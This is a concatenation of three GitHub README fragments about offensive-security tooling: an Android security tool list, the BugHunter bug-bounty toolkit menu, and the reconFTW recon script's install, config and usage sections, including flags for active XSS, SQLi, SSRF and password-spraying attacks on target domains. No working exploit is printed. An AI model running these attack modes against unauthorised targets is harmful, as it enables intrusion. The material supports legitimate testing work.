1. [JAADAS](https://github.com/flankerhqd/JAADAS) - Joint intraprocedural and interprocedural program analysis tool to find vulnerabilities in Android apps, built on Soot and Scala
1. [Quark-Engine](https://github.com/quark-engine/quark-engine) - An Obfuscation-Neglect Android Malware Scoring System
1. [One Step Decompiler](https://github.com/b-mueller/apkx) - Android APK Decompilation for the Lazy
1. [APKLeaks](https://github.com/dwisiswant0/apkleaks) - Scanning APK file for URIs, endpoints & secrets.
1. [Mobile Audit](https://github.com/mpast/mobileAudit) - Web application for performing Static Analysis and detecting malware in Android APKs.
1. ~~[Several tools from PSU](http://siis.cse.psu.edu/tools.html)~~
### App Vulnerability Scanners
1. [QARK](https://github.com/linkedin/qark/) - QARK by LinkedIn is for app developers to scan apps for security issues
1. [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
1. [Nogotofail](https://github.com/google/nogotofail)
1. ~~[Devknox](https://devknox.io/) - IDE plugin to build secure Android apps. Not maintained anymore.~~
### Dynamic Analysis Tools
1. [Android DBI frameowork](http://www.mulliner.org/blog/blosxom.cgi/security/androiddbiv02.html)
1. [Androl4b](https://github.com/sh4hin/Androl4b)- A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis
1. [House](https://github.com/nccgroup/house)- House: A runtime mobile application analysis toolkit with a Web GUI, powered by Frida, written in Python.
1. [Mobile-Security-Framework MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) - Mobile Security Framework is an intelligent, all-in-one open-source mobile application (Android/iOS) automated pen-testing framework capable of performing static, dynamic analysis and web API testing.
1. [AppUse](https://appsec-labs.com/AppUse/) – custom build for penetration testing
1. [Droidbox](https://github.com/pjlantz/droidbox)
1. [Drozer](https://github.com/mwrlabs/drozer)
1. [Xposed](https://forum.xda-developers.com/xposed/xposed-installer-versions-changelog-t2714053) - equivalent of doing Stub-based code injection but without any modifications to the binary
1. [Inspeckage](https://github.com/ac-pm/Inspeckage) - Android Package Inspector - dynamic analysis with API hooks, start unexported activities, and more. (Xposed Module)
1. [Android Hooker](https://github.com/AndroidHooker/hooker) - Dynamic Java code instrumentation (requires the Substrate Framework)
1. [ProbeDroid](https://github.com/ZSShen/ProbeDroid) - Dynamic Java code instrumentation
1. ~~[Android Tamer](https://androidtamer.com/) - Virtual / Live Platform for Android Security Professionals~~
1. [DECAF](https://github.com/sycurelab/DECAF) - Dynamic Executable Code Analysis Framework based on QEMU (DroidScope is now an extension to DECAF)
1. [CuckooDroid](https://github.com/idanr1986/cuckoo-droid) - Android extension for Cuckoo sandbox
1. [Mem](https://github.com/MobileForensicsResearch/mem) - Memory analysis of Android (root required)
1. [Crowdroid](http://www.ida.liu.se/labs/rtslab/publications/2011/spsm11-burguera.pdf) – unable to find the actual tool
1. [AuditdAndroid](https://github.com/nwhusted/AuditdAndroid) – android port of auditd, not under active development anymore
1. [Android Security Evaluation Framework](https://code.google.com/p/asef/) - not under active development anymore
1. [Aurasium](https://github.com/xurubin/aurasium) – Practical security policy enforcement for Android apps via bytecode rewriting and in-place reference monitor.
1. [Android Linux Kernel modules](https://github.com/strazzere/android-lkms)
1. [Appie](https://manifestsecurity.com/appie/) - Appie is a software package that has been pre-configured to function as an Android Pentesting Environment. It is completely portable and can be carried on a USB stick or smartphone. This is a one-stop answer for all the tools needed in Android Application Security Assessment and an awesome alternative to existing virtual machines.
1. [StaDynA](https://github.com/zyrikby/StaDynA) - a system supporting security app analysis in the presence of dynamic code update features (dynamic class loading and reflection). This tool combines static and dynamic analysis of Android applications in order to reveal the hidden/updated behavior and extend static analysis results with this information.
1. [DroidAnalytics](https://github.com/zhengmin1989/DroidAnalytics) - incomplete
1. [Vezir Project](https://github.com/oguzhantopgul/Vezir-Project) - Virtual Machine for Mobile Application Pentesting and Mobile Malware Analysis
1. [MARA](https://github.com/xtiankisutsa/MARA_Framework) - Mobile Application Reverse Engineering and Analysis Framework
1. [Taintdroid](http://appanalysis.org) - requires AOSP compilation
1. [ARTist](https://artist.cispa.saarland) - a flexible open-source instrumentation and hybrid analysis framework for Android apps and Android's Java middleware. It is based on the Android Runtime's (ART) compiler and modifies code during on-device compilation.
1. [Android Malware Sandbox](https://github.com/Areizen/Android-Malware-Sandbox)
1. [AndroPyTool](https://github.com/alexMyG/AndroPyTool) - a tool for extracting static and dynamic features from Android APKs. It combines different well-known Android app analysis tools such as DroidBox, FlowDroid, Strace, AndroGuard, or VirusTotal analysis.
1. [Runtime Mobile Security (RMS)](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime
1. [PAPIMonitor](https://github.com/Dado1513/PAPIMonitor) – PAPIMonitor (Python API Monitor for Android apps) is a Python tool based on Frida for monitoring user-select APIs during the app execution.
1. [Android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer) - The tool is used to analyze the content of the Android application in local storage.
1. ~~[Android Malware Analysis Toolkit](http://www.mobilemalware.com.br/amat/download.html) - (Linux distro) Earlier it use to be an [online analyzer](http://dunkelheit.com.br/amat/analysis/index_en.php)~~
1. ~~[Android Reverse Engineering](https://redmine.honeynet.org/projects/are/wiki) – ARE (android reverse engineering) not under active development anymore~~
1. ~~[ViaLab Community Edition](https://www.nowsecure.com/blog/2014/09/09/introducing-vialab-community-edition/)~~
1. ~~[Mercury](https://labs.mwrinfosecurity.com/tools/2012/03/16/mercury/)~~
1. ~~[Cobradroid](https://thecobraden.com/projects/cobradroid/) – custom image for malware analysis~~
### Reverse Engineering
1. [Smali/Baksmali](https://github.com/JesusFreke/smali) – apk decompilation
1. [emacs syntax coloring for smali files](https://github.com/strazzere/Emacs-Smali)
1. [vim syntax coloring for smali files](http://codetastrophe.com/smali.vim)
1. [AndBug](https://github.com/swdunlop/AndBug)
1. [Androguard](https://github.com/androguard/androguard) – powerful, integrates well with other tools
1. [Apktool](https://ibotpeaches.github.io/Apktool/) – really useful for compilation/decompilation (uses smali)
1. [Android Framework for Exploitation](https://github.com/appknox/AFE)
1. [Bypass signature and permission checks for IPCs](https://github.com/iSECPartners/Android-KillPermAndSigChecks)
1. [Android OpenDebug](https://github.com/iSECPartners/Android-OpenDebug) – make any application on the device debuggable (using cydia substrate).
1. [Dex2Jar](https://github.com/pxb1988/dex2jar) - dex to jar converter
1. [Enjarify](https://github.com/google/enjarify) - dex to jar converter from Google
1. [Dedexer](https://sourceforge.net/projects/dedexer/)
1. [Fino](https://github.com/sysdream/fino)
1. [Frida](https://www.frida.re/) - inject javascript to explore applications and a [GUI tool](https://github.com/antojoseph/diff-gui) for it
1. [Indroid](https://bitbucket.org/aseemjakhar/indroid) – thread injection kit
1. [IntentSniffer](https://www.nccgroup.com/us/our-research/intent-sniffer/)
1. [Introspy](https://github.com/iSECPartners/Introspy-Android)
1. [Jad]( https://varaneckas.com/jad/) - Java decompiler
1. [JD-GUI](https://github.com/java-decompiler/jd-gui) - Java decompiler
1. [CFR](http://www.benf.org/other/cfr/) - Java decompiler
1. [Krakatau](https://github.com/Storyyeller/Krakatau) - Java decompiler
1. [FernFlower](https://github.com/fesh0r/fernflower) - Java decompiler
1. [Redexer](https://github.com/plum-umd/redexer) – apk manipulation
1. [Simplify Android deobfuscator](https://github.com/CalebFenton/simplify)
1. [Bytecode viewer](https://github.com/Konloch/bytecode-viewer)
1. [Radare2](https://github.com/radare/radare2)
1. [Jadx](https://github.com/skylot/jadx)
1. [Dwarf](https://github.com/iGio90/Dwarf) - GUI for reverse engineering
1. [Andromeda](https://github.com/secrary/Andromeda) - Another basic command-line reverse engineering tool
1. [apk-mitm](https://github.com/shroudedcode/apk-mitm) - A CLI application that prepares Android APK files for HTTPS inspection
1. [Noia](https://github.com/0x742/noia) - Simple Android application sandbox file browser tool
1. [Obfuscapk](https://github.com/ClaudiuGeorgiu/Obfuscapk) - Obfuscapk is a modular Python tool for obfuscating Android apps without needing their source code.
1. [ARMANDroid](https://github.com/Mobile-IoT-Security-Lab/ARMANDroid) - ARMAND (Anti-Repackaging through Multi-patternAnti-tampering based on Native Detection) is a novel anti-tampering protection scheme that embeds logic bombs and AT detection nodes directly in the apk file without needing their source code.
1. [MVT (Mobile Verification Toolkit)](https://github.com/mvt-project/mvt) - a collection of utilities to simplify and automate the process of gathering forensic traces helpful to identify a potential compromise of Android and iOS devices
1. ~~[Procyon](https://bitbucket.org/mstrobel/procyon/wiki/Java%20Decompiler) - Java decompiler~~
1. ~~[Smali viewer](http://blog.avlyun.com/wp-content/uploads/2014/04/SmaliViewer.zip)~~
1. ~~[ZjDroid](https://github.com/BaiduSecurityLabs/ZjDroid)~~, ~~[fork/mirror](https://github.com/yangbean9/ZjDroid)~~
1. ~~[Dare](http://siis.cse.psu.edu/dare/index.html) – .dex to .class converter~~
1. [Decompiler.com](https://www.decompiler.com/) - Online APK and Java decompiler
### Fuzz Testing
1. [Radamsa Fuzzer](https://github.com/anestisb/radamsa-android)
1. [Honggfuzz](https://github.com/google/honggfuzz)
1. [An Android port of the Melkor ELF fuzzer](https://github.com/anestisb/melkor-android)
1. [Media Fuzzing Framework for Android](https://github.com/fuzzing/MFFA)
1. [AndroFuzz](https://github.com/jonmetz/AndroFuzz)
1. [QuarksLab's Android Fuzzing](https://github.com/quarkslab/android-fuzzing)
1. ~~[IntentFuzzer](https://www.nccgroup.trust/us/about-us/resources/intent-fuzzer/)~~
### App Repackaging Detectors
1. [FSquaDRA](https://github.com/zyrikby/FSquaDRA) - a tool for the detection of repackaged Android applications based on app resources hash comparison.
### Market Crawlers
1. [Google Play crawler (Java)](https://github.com/Akdeniz/google-play-crawler)
1. [Google Play crawler (Python)](https://github.com/egirault/googleplay-api)
1. [Google Play crawler (Node)](https://github.com/dweinstein/node-google-play) - get app details and download apps from the official Google Play Store.
1. [Aptoide downloader (Node)](https://github.com/dweinstein/node-aptoide) - download apps from Aptoide third-party Android market
1. [Appland downloader (Node)](https://github.com/dweinstein/node-appland) - download apps from Appland third-party Android market
1. [Apkpure](https://apkpure.com/) - Online apk downloader. Provides also its own app for downloading.
1. [PlaystoreDownloader](https://github.com/ClaudiuGeorgiu/PlaystoreDownloader) - PlaystoreDownloader is a tool for downloading Android applications directly from the Google Play Store. After an initial (one-time) configuration, applications can be downloaded by specifying their package name.
1. [APK Downloader](https://apkcombo.com/apk-downloader/) Online Service to download APK from Playstore for specific Android Device Configuration
### Misc Tools
1. [smalihook](http://androidcracking.blogspot.com/2011/03/original-smalihook-java-source.html)
1. [AXMLPrinter2](http://code.google.com/p/android4me/downloads/detail?name=AXMLPrinter2.jar) - to convert binary XML files to human-readable XML files
1. [adb autocomplete](https://github.com/mbrubeck/android-completion)
1. [mitmproxy](https://github.com/mitmproxy/mitmproxy)
1. [dockerfile/androguard](https://github.com/dweinstein/dockerfile-androguard)
1. [Android Vulnerability Test Suite](https://github.com/AndroidVTS/android-vts) - android-vts scans a device for set of vulnerabilities
1. [AppMon](https://github.com/dpnishant/appmon)- AppMon is an automated framework for monitoring and tampering with system API calls of native macOS, iOS, and Android apps. It is based on Frida.
1. [Internal Blue](https://github.com/seemoo-lab/internalblue) - Bluetooth experimentation framework based on Reverse Engineering of Broadcom Bluetooth Controllers
1. [Android Mobile Device Hardening](https://github.com/SecTheTech/AMDH) - AMDH scans and hardens the device's settings and lists harmful installed Apps based on permissions.
1. ~~[Android Device Security Database](https://www.android-device-security.org/client/datatable) - Database of security features of Android devices~~
1. ~~[Opcodes table for quick reference](http://ww38.xchg.info/corkami/opcodes_tables.pdf)~~
1. ~~[APK-Downloader](http://codekiem.com/2012/02/24/apk-downloader/)~~ - seems dead now
1. ~~[Dalvik opcodes](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)~~
### Vulnerable Applications for practice
1. [Damn Insecure Vulnerable Application (DIVA)](https://github.com/payatu/diva-android)
1. [Vuldroid](https://github.com/jaiswalakshansh/Vuldroid)
1. [ExploitMe Android Labs](http://securitycompass.github.io/AndroidLabs/setup.html)
1. [GoatDroid](https://github.com/jackMannino/OWASP-GoatDroid-Project)
1. [Android InsecureBank](https://github.com/dineshshetty/Android-InsecureBankv2)
1. [Insecureshop](https://github.com/optiv/insecureshop)
1. [Oversecured Vulnerable Android App (OVAA)](https://github.com/oversecured/ovaa)
## Academic/Research/Publications/Books
### Research Papers
1. [Exploit Database](https://www.exploit-db.com/papers/)
1. [Android security-related presentations](https://github.com/jacobsoo/AndroidSlides)
1. [A good collection of static analysis papers](https://tthtlc.wordpress.com/2011/09/01/static-analysis-of-android-applications/)
### Books
1. [SEI CERT Android Secure Coding Standard](https://www.securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard)
### Others
1. [OWASP Mobile Security Testing Guide Manual](https://github.com/OWASP/owasp-mstg)
1. [doridori/Android-Security-Reference](https://github.com/doridori/Android-Security-Reference)
1. [android app security checklist](https://github.com/b-mueller/android_app_security_checklist)
1. [Mobile App Pentest Cheat Sheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet)
1. [Android Reverse Engineering 101 by Daniele Altomare (Web Archive link)](http://web.archive.org/web/20180721134044/http://www.fasteque.com:80/android-reverse-engineering-101-part-1/)
1. ~~[Mobile Security Reading Room](https://mobile-security.zeef.com) - A reading room that contains well-categorized technical reading material about mobile penetration testing, mobile malware, mobile forensics, and all kind of mobile security-related topics~~
## Exploits/Vulnerabilities/Bugs
### List
1. [Android Security Bulletins](https://source.android.com/security/bulletin/)
1. [Android's reported security vulnerabilities](https://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html)
1. [AOSP - Issue tracker](https://code.google.com/p/android/issues/list?can=2&q=priority=Critical&sort=-opened)
1. [OWASP Mobile Top 10 2016](https://www.owasp.org/index.php/Mobile_Top_10_2016-Top_10)
1. [Exploit Database](https://www.exploit-db.com/search/?action=search&q=android) - click search
1. [Vulnerability Google Doc](https://docs.google.com/spreadsheet/pub?key=0Am5hHW4ATym7dGhFU1A4X2lqbUJtRm1QSWNRc3E0UlE&single=true&gid=0&output=html)
1. [Google Android Security Team’s Classifications for Potentially Harmful Applications (Malware)](https://source.android.com/security/reports/Google_Android_Security_PHA_classifications.pdf)
1. ~~[Android Devices Security Patch Status](https://kb.androidtamer.com/Device_Security_Patch_tracker/)~~
### Malware
1. [androguard - Database Android Malware wiki](https://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares)
1. [Android Malware Github repo](https://github.com/ashishb/android-malware)
1. [Android Malware Genome Project](http://www.malgenomeproject.org/policy.html) - contains 1260 malware samples categorized into 49 different malware families, free for research purposes.
1. [Contagio Mobile Malware Mini Dump](http://contagiominidump.blogspot.com)
1. [Drebin](https://www.sec.tu-bs.de/~danarp/drebin/)
1. [Kharon Malware Dataset](http://kharon.gforge.inria.fr/dataset/) - 7 malware which have been reverse-engineered and documented
1. [Android Adware and General Malware Dataset](https://www.unb.ca/cic/datasets/android-adware.html)
1. [AndroZoo](https://androzoo.uni.lu/) - AndroZoo is a growing collection of Android Applications collected from several sources, including the official Google Play app market.
1. ~~[Android PRAGuard Dataset](http://pralab.diee.unica.it/en/AndroidPRAGuardDataset) - The dataset contains 10479 samples, obtained by obfuscating the MalGenome and the Contagio Minidump datasets with seven different obfuscation techniques.~~
1. ~~[Admire](http://admire.necst.it/)~~
### Bounty Programs
1. [Android Security Reward Program](https://www.google.com/about/appsecurity/android-rewards/)
### How to report Security issues
1. [Android - reporting security issues](https://source.android.com/security/overview/updates-resources.html#report-issues)
1. [Android Reports and Resources](https://github.com/B3nac/Android-Reports-and-Resources) - List of Android Hackerone disclosed reports and other resources
## Contributing
Your contributions are always welcome!
|
<p align="center"><img src="https://github.com/thehackingsage/BugHunter/blob/master/logo.png?raw=true" /></p>
## Bug Hunter Menu :
- Information Gathering
- Mapping
- Discovery
- Exploitation
- PoCs & Reporting
### Information Gathering :
- Basic Commands for Information Gathering
- Masscan - TCP Port Scanner
- DNS Recon - DNS Enumeration
- Sublist3r - Find Subdomains
- Alt-DNS - Subdomain Discovery
- Amass - In-Depth DNS Enumeration
- Subfinder - Subdomain Discovery Tool
- Enumall - Setup Script for Regon-NG
- Aquatone - Reconnaissance on Domain Names
- Cloudflare_Enum - Cloudflare DNS Enumeration
- InfoG - Information Gathering Tool
- The Harvester - E-mail, SubDomain, Ports etc.
- Recon-NG - Web Reconnaissance Framework
- SetoolKit - Social Engineering Toolkit
- WhatWeb - Next Generation Web Scanner
- Maltego - Interactive Data Mining Tool
### Mapping :
- Nmap - IP's, Open Ports and Much More
- Firefox - Web Browser
- Firefox Browser Extensions
- Burp Suite Pro
- Burp Suite Extensions
- Intruder Payloads for Burp Suite
- Payloads All The Thing
### Discovery :
- Acunetix-WVS
- Arachni
- Burp Suite
- Nexpose
- Nikto
- Vega
- Wapiti
- Web Security Scanner
- Websecurify Suite
- Joomscan
- w3af
- Zed Attack Proxy
- WP-Scan
- FuzzDB
- CeWL
### Exploitation :
XSS :
- XSS Radar
- XSSHunter
- xssHunter Client
- DOMxssScanner
- XSSer
- BruteXSS
- XSStrike
- XSS'OR
SQLi :
- SQLmap
XXE :
- OXML-xxe
- XXEinjextor
SSTI :
- Tplmap
SSRF :
- SSRF-Detector
- Ground Control
LFI :
- LFISuit
Mobile :
- MobSF
- GenyMotion
- Apktool
- dex2jar
- jd-gui
- idb
Other :
- Gen-xbin-Avi
- GitTools
- DVCS Ripper
- TKO Subs
- SubBruteforcer
- Second-Order
- Race The Web
- CORStest
- RCE Struts-pwn
- ysoSerial
- PHPGGC
- Retire-js
- Getsploit
- Findsploit
- BFAC
- WP-Scan
- CMSmap
- Joomscan
- JSON W T T
- Wfuzz
- Patator
- Netcat
- ChangeMe
- wappalyzer
- builtwith
- wafw00f
- assetnote
- jsbeautifier
- LinkFinder
### PoCs & Reporting :
- Bug Bounty Platforms
- POCs (Proof of Concepts)
- CheatSheet
- EyeWitness
- HttpScreenshot
- BugBountyTemplates
- Template Generator
## How To Install :
```git clone https://github.com/thehackingsage/bughunter.git && cd bughunter && chmod +x bughunter.py && sudo cp bughunter.py /usr/bin/bughunter```
that's it.. type ***bughunter*** in terminal to execute the tool.
Video Tutorial : https://www.youtube.com/watch?v=opvQIgUD0Jc&t=18s
## Download Directory :
Normal User : /home/$USER/bughunter/
Root User : /root/bughunter/
- ~/bughunter/info/ : Tools for Information Gathering
- ~/bughunter/mapp/ : Tools for Mapping
- ~/bughunter/disc/ : Tools for Discovery
- ~/bughunter/expt/ : Tools for Exploitation
- ~/bughunter/rept/ : Tools for Reporting
- ~/bughunter/sage/ : Tools by Mr. SAGE
View Tool's README.md File for Installation Instruction and How To Use Guide.
## Source :
TBHM3, GitHub, Bug Bounty Forum, Google and Few Bug Hunting Articles.
## License :
[MIT Licence](https://github.com/thehackingsage/BugHunter/blob/master/LICENSE)
That's it... If You Like This Repo. Please Share This With Your Friends..
& Don't Forget To Follow Me At [Twitter](https://www.twitter.com/thehackingsage), [Instagram](https://www.instagram.com/thehackingsage), [Github](https://www.github.com/thehackingsage)
& SUBSCRIBE My [YouTube](https://www.youtube.com/channel/UCYK1n9A4TUq1CvGc6F3DzoA) Channel..!!!
***Thankyou.***
***Happy Hunting..***
|
<h1 align="center">
<br>
<a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a>
<br>
reconFTW
<br>
</h1>
<h4 align="center">A simple bash script for full recon</h4>
<p align="center">
<a href="https://github.com/six2dez/reconftw/releases/tag/v1.6.0">
<img src="https://img.shields.io/badge/release-v1.6.0-green">
</a>
</a>
<a href="https://www.gnu.org/licenses/gpl-3.0.en.html">
<img src="https://img.shields.io/badge/license-GPL3-_red.svg">
</a>
<a href="https://twitter.com/Six2dez1">
<img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue">
</a>
<a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed">
<img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg">
</a>
<a href="https://github.com/six2dez/reconftw/wiki">
<img src="https://img.shields.io/badge/doc-wiki-blue.svg">
</a>
<a href="https://t.me/joinchat/H5bAaw3YbzzmI5co">
<img src="https://img.shields.io/badge/telegram-@ReconFTW-blue.svg">
</a>
<a href="https://hub.docker.com/r/six2dez/reconftw">
<img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw">
</a>
</p>
📔 Table of Contents
-----------------
- [💿 Installation:](#-installation)
- [a) In your PC/VPS/VM](#a-in-your-pcvpsvm)
- [b) Docker container 🐳 (2 options)](#b-docker-container--2-options)
- [1) From DockerHub](#1-from-dockerhub)
- [2) From repository](#2-from-repository)
- [⚙️ Config file:](#️-config-file)
- [Usage:](#usage)
- [Example Usage:](#example-usage)
- [Axiom Support: :cloud:](#axiom-support-cloud)
- [Sample video:](#sample-video)
- [:fire: Features :fire:](#fire-features-fire)
- [Mindmap/Workflow](#mindmapworkflow)
- [Data Keep](#data-keep)
- [Main commands:](#main-commands)
- [How to contribute:](#how-to-contribute)
- [Need help?](#need-help)
- [You can support this work buying me a coffee:](#you-can-support-this-work-buying-me-a-coffee)
- [Thanks :pray:](#thanks-pray)
---
# 💿 Installation:
## a) In your PC/VPS/VM
> You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book:
- Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**)
```bash
▶ git clone https://github.com/six2dez/reconftw
▶ cd reconftw/
▶ ./install.sh
▶ ./reconftw.sh -d target.com -r
```
## b) Docker container 🐳 (2 options)
### 1) From [DockerHub](https://hub.docker.com/r/six2dez/reconftw)
```bash
▶ docker pull six2dez/reconftw:main
▶ docker run -it six2dez/reconftw:main /bin/bash
# Exit the container and run these commands additionally if you want to gain persistence:
▶ docker start $(docker ps -a|grep six2dez/reconftw:main|cut -d' ' -f1)
▶ docker exec -it $(docker ps -a|grep six2dez/reconftw:main|cut -d' ' -f1) /bin/bash
# Now you can exit the container and run again this command without files loss:
▶ docker exec -it $(docker ps -a|grep six2dez/reconftw:main|cut -d' ' -f1) /bin/bash
```
### 2) From repository
```bash
▶ git clone https://github.com/six2dez/reconftw
▶ cd reconftw/Docker
▶ docker build -t reconftw .
▶ docker run -it reconftw /bin/bash
```
# ⚙️ Config file:
> A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book:
- Through ```reconftw.cfg``` file the whole execution of the tool can be controlled.
- Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more.
<details>
<br><br>
<summary> :point_right: Click here to view default config file :point_left: </summary>
```yaml
#################################################################
# reconFTW config file #
#################################################################
# TERM COLORS
bred='\033[1;31m'
bblue='\033[1;34m'
bgreen='\033[1;32m'
yellow='\033[0;33m'
red='\033[0;31m'
blue='\033[0;34m'
green='\033[0;32m'
reset='\033[0m'
# General values
tools=~/Tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
profile_shell=".$(basename $(echo $SHELL))rc"
reconftw_version=$(git branch --show-current)-$(git describe --tags)
update_resolvers=true
proxy_url="http://127.0.0.1:8080/"
#dir_output=/custom/output/path
# Golang Vars (Comment or change on your own)
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH
# Tools config files
#NOTIFY_CONFIG=~/.config/notify/notify.conf # No need to define
#SUBFINDER_CONFIG=~/.config/subfinder/config.yaml # No need to define
AMASS_CONFIG=~/.config/amass/config.ini
GITHUB_TOKENS=${tools}/.github_tokens
# APIs/TOKENS - Uncomment the lines you set removing the '#' at the beginning of the line
#SHODAN_API_KEY=XXXXXXXXXXXXX
#XSS_SERVER=six2dez.xss.ht
#COLLAB_SERVER=XXXXXXXXXXXXXXXXX
#findomain_virustotal_token=XXXXXXXXXXXXXXXXX
#findomain_spyse_token=XXXXXXXXXXXXXXXXX
#findomain_securitytrails_token=XXXXXXXXXXXXXXXXX
#findomain_fb_token=XXXXXXXXXXXXXXXXX
# File descriptors
DEBUG_STD="&>/dev/null"
DEBUG_ERROR="2>/dev/null"
# Osint
OSINT=true
GOOGLE_DORKS=true
GITHUB_DORKS=true
METADATA=true
EMAILS=true
DOMAIN_INFO=true
# Subdomains
SUBCRT=true
SUBBRUTE=true
SUBSCRAPING=true
SUBPERMUTE=true
SUBTAKEOVER=true
SUBRECURSIVE=true
ZONETRANSFER=true
S3BUCKETS=true
# Web detection
WEBPROBESIMPLE=true
WEBPROBEFULL=true
WEBSCREENSHOT=true
UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672"
# Host
FAVICON=true
PORTSCANNER=true
PORTSCAN_PASSIVE=true
PORTSCAN_ACTIVE=true
CLOUD_IP=true
# Web analysis
WAF_DETECTION=true
NUCLEICHECK=true
URL_CHECK=true
URL_GF=true
URL_EXT=true
JSCHECKS=true
PARAMS=true
FUZZ=true
CMS_SCANNER=true
WORDLIST=true
# Vulns
XSS=true
CORS=true
TEST_SSL=true
OPEN_REDIRECT=true
SSRF_CHECKS=true
CRLF_CHECKS=true
LFI=true
SSTI=true
SQLI=true
BROKENLINKS=true
SPRAY=true
BYPASSER4XX=true
# Extra features
NOTIFICATION=false
DEEP=false
DIFF=false
REMOVETMP=false
PROXY=false
# HTTP options
HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
# Threads
FFUF_THREADS=40
HTTPX_THREADS=50
HTTPX_UNCOMMONPORTS_THREADS=100
GOSPIDER_THREADS=50
GITDORKER_THREADS=5
BRUTESPRAY_THREADS=20
BRUTESPRAY_CONCURRENCE=10
ARJUN_THREADS=20
GAUPLUS_THREADS=10
DALFOX_THREADS=200
PUREDNS_TRUSTED_LIMIT=400
# lists
fuzz_wordlist=${tools}/fuzz_wordlist.txt
lfi_wordlist=${tools}/lfi_wordlist.txt
subs_wordlist=${tools}/subdomains.txt
subs_wordlist_big=${tools}/subdomains_big.txt
resolvers=${tools}/resolvers.txt
resolvers_trusted=${tools}/resolvers_trusted.txt
```
</details>
# Usage:
> Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book:
**TARGET OPTIONS**
| Flag | Description |
|------|-------------|
| -d | Target domain *(example.com)* |
| -m | Multiple domain target *(companyName)* |
| -l | Target list *(one per line)* |
| -x | Exclude subdomains list *(Out Of Scope)* |
**MODE OPTIONS**
| Flag | Description |
|------|-------------|
| -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) |
| -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers |
| -p | Passive - Perform only passive steps |
| -a | All - Perform whole recon and all active attacks |
| -w | Web - Just web checks on the list provided |
| -v | Verbose - Prints everything including errors, for debug purposes |
| -h | Help - Show this help menu |
**GENERAL OPTIONS**
| Flag | Description |
|------|-------------|
| --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) |
| -o | Output directory |
# Example Usage:
**To perform a full recon on single target**
```bash
▶ ./reconftw.sh -d target.com -r
```
**To perform a full recon on a list of targets**
```bash
▶ ./reconftw.sh -l sites.txt -r -o /output/directory/
```
**Perform all steps (whole recon + all attacks)**
```bash
▶ ./reconftw.sh -d target.com -a
```
**Perform full recon with more time intense tasks** *(VPS intended only)*
```bash
▶ ./reconftw.sh -d target.com -r --deep -o /output/directory/
```
**Perform recon in a multi domain target**
```bash
▶ ./reconftw.sh -m company -l domains_list.txt -r
```
**Show help section**
```bash
▶ ./reconftw.sh -h
```
# Axiom Support: :cloud:
![](https://i.ibb.co/Jzrgkqt/axiom-readme.png)
> Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version)
* Using ```reconftw_axiom.sh``` script you can take advantage of running **reconFTW** with [Axiom](https://github.com/pry0cc/axiom).
* As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time.
* Currently except the ```-a``` flag, all flags are supported when running with Axiom.
```bash
▶ ./reconftw_axiom.sh -d target.com -r
```
# Sample video:
![Video](images/reconFTW.gif)
# :fire: Features :fire:
- Domain information parser ([domainbigdata](https://domainbigdata.com/))
- Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester))
- Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail))
- Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder))
- Google Dorks ([degoogle_hunter](https://github.com/six2dez/degoogle_hunter))
- Github Dorks ([GitDorker](https://github.com/obheda12/GitDorker))
- Multiple subdomain enumeration techniques (passive, bruteforce, permutations and scraping)
- Passive ([subfinder](https://github.com/projectdiscovery/subfinder), [assetfinder](https://github.com/tomnomnom/assetfinder), [amass](https://github.com/OWASP/Amass), [findomain](https://github.com/Findomain/Findomain), [crobat](https://github.com/cgboal/sonarsearch), [waybackurls](https://github.com/tomnomnom/waybackurls), [github-subdomains](https://github.com/gwen001/github-subdomains), [Anubis](https://jldc.me) and [mildew](https://github.com/daehee/mildew))
